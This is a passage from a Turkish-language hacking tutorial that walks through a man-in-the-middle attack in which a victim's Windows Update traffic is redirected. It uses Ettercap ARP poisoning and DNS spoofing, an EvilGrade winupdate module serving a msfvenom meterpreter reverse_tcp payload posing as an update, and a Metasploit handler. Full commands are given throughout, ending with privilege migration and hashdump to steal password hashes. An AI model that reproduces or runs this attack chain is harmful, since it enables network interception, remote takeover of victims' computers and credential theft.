Üstteki ekran görüntüsünde de görüldüğü gibi “microsoft.com” üst alan adındaki bir takım sitelere erişim sağlanmaya çalışıldığında “agent.exe” adlı uygulama gönderilecektir.

“winupdate” Modülünün ve İlgili Kaynakların Ayarlanması
winupdate modülünde iki önemli nokta vardır: VirtualHost ve Agent. Bu başlıkta, 2 değere göre kaynak ayarlaması gerçekleştirilecektir.

VirtualHost: Kurban bilgisayara gerçekleştirilecek DNS Spoofing saldırısı için Ettercap adı verilen bir uygulama kullanılacaktır. Ettercap uygulaması, DNS spoofing için “/usr/local/share/ettercap/etter.dns” adlı dosyadaki DNS kayıtlarını kullanmaktadır. Bu dosya açılarak içerisine Microsoft sistemlerinin güncellenmesi için kulanılan DNS kayıtları için saldırgan tarafından belirlenen IP adresleri yazılır. Bu adres saldırganın sahip olduğu başka bir saldırı makinesi olabileceği gibi, saldırgann kullandığı Backtrack makinesi de olabilir. Örnek olarak saldırganın makinesi verilmiştir:

Agent: Kurbana gönderilecek olan ajan uygulamanın oluşturulması için msfcli, msfpayload, msfvenom, veya diğer teknikler kullanılabilir. Örnek olarak msfvenom kullanılacaktır. Bu amaçla ayrı bir konsolda msfvenom dizini tespit edilir:

which msfvenom
ls -la /usr/local/bin/msfvenom

EvilGrade uygulamasının başlatıldığı konsola geri dönülerek ajan uygulama oluşturulur. Bunun için, msfvenom kullanılarak kurbanın bağlanması istenen IP adresi (192.168.100.75) ve porta (TCP/4444) bağlantıyı sağlayacak olan “WindowsGuncellemeSaldirisi.exe” adlı bir exe oluşturulup tmp dizinine kaydedilir. Daha sonra da bu exe, ajan olarak ayarlanır.

set agent '["/opt/metasploit-4.4.0/app/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.100.75 LPORT=4444 -f exe  1> <%OUT%>/tmp/WindowsGuncellemeSaldirisi.exe<%OUT%>"]'

Ettercap ile DNS Spoofing İşleminin Başlatılması
Öncelikle boş bir konsol kullanılarak Ettercap arayüzü açılır. Daha sonra da spoofing işlemini gerçekleştirecek olan saldırganın ilgili ağ adaptörü seçilir (Shift + U).

ettercap -G
Sniff > Unified Sniffing 

Not: Seçilen adaptörün dinleme modunda olduğu görülmektedir.

Gelinen pencerede eklentiler listelenir (CTRL + P) ve “dns_spoof” adlı eklenti iki kerek tıklanarak aktifleştirilir:

Plugins > Manage the plugins
dns_spoof

Erişim sağlanabilen sistemler taranır (CTRL + S).

Hosts > Scan for hosts

Not: Tarama sonucunda tespit edilen sistemler listelenebilir (H):

Hosts > Hosts list

Tespit edilen sistemlere Arp zehirlemesi yapılır.

Mitm > Arp poisoning
Optional parameters: Sniff remote connections.

Not: Arp zehirleme işlemin gerçekleştirileceği gruplar otomatik olarak oluşur.

Dinleme işlemi başlatılır (CTRL +W).

Start > Start Sniffing

Not: İstemcinin herhangi bir işleminde saldırgan araya girmiş bulunmaktadır.

Saldırganın Kurban Bilgisayarı Dinlemesi
Saldırgan, saldırıya geçmeden önce kurbanın bağlantıyı kurdupubnda bu bağlantıyı dinleyeceği bir ortam gereklidir. Bu ortamı netcat sağlayabileceği gibi, meterpreter kabuğu ile iletişim kurabilen handler modülü de sağlayabilir. Kurbanın kuracağı bağlantıyı dinlemek için handler modülü başlatılır ve bağlantının kurulacağı IP (192.168.100.75) ve Port (4444) bilgisi girilir.

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.75
set LPORT 4444
show options

Gerekli ayarlamalar uygun şekilde gerçekleştirildikten sonra, kurbanın bağlantıyı başlatması beklenir:

Kurbanın Windows Güncelleştirmesini Başlatması ve Zararlı Yazılımı Alması
Kurban bilgisayarda Windows işletim sistemi güncelleştirilmesi için “windows.update.microsoft.com” adresi kullanılabilir:

Not: İşletim sisteminin otomatik olarak güncellenmesi de beklenebilirdi.
Ettercap’İn DNS kayıtlarını değiştirmesi sayesinde, kurban bilgisayar, Microsoft’un sitesi yerine saldırganın makinesine gider. EvilGrade’in winupdate modülü sayesinde de, kurban bilgisayar, yasal güncelleme paketi yerine, msfvenom ile oluşturulan zararlı yazılımı indirir:

Kurban zararlı yazılımı masaüstüne kaydeder:

Not: Zararlı yazılımının talep edilmesi EvilGrade üzerinde de görülebilmektedir.

Kurbanın Zararlı Yazılımı Çalıştırması ve Saldırganın Kurban Bilgisayarına Bağlanması
Kurban masaüstündeki zararlı yazılımı çalıştırır.

Kurban bilgisayarda bu zararlı yazılım çalıştırıldığında, yazılımın oluşturulduğu PAYLOAD sayesinde, kurban, saldırganın bilgisayarına bağlantı kuracaktır. Böylece bağlantı kurulmasını bekleyen Handler modülüne bağlantı kurulmuştur:

Artık hak yükseltme işlemi gerçekleştirilebilir. Bu amaçla tüm prosesler listelenir:

ps

Sistem hakları ile çalışan uygun bir prosese sıçranır. İstenirse yerel makinedeki hesapların parola özetleri elde edilebilir veya başka işlemler gerçekleştirilebilir:

migrate 1124
getuid
hashdump

Kaynak site:
http://www.mshowto.org/mitm-saldiri-yontemi-ile-windows-server-2008-nasil-hack-edilir.html
http://r00tsec.blogspot.com/2011/07/hacking-with-evilgrade-on-backtrack5.html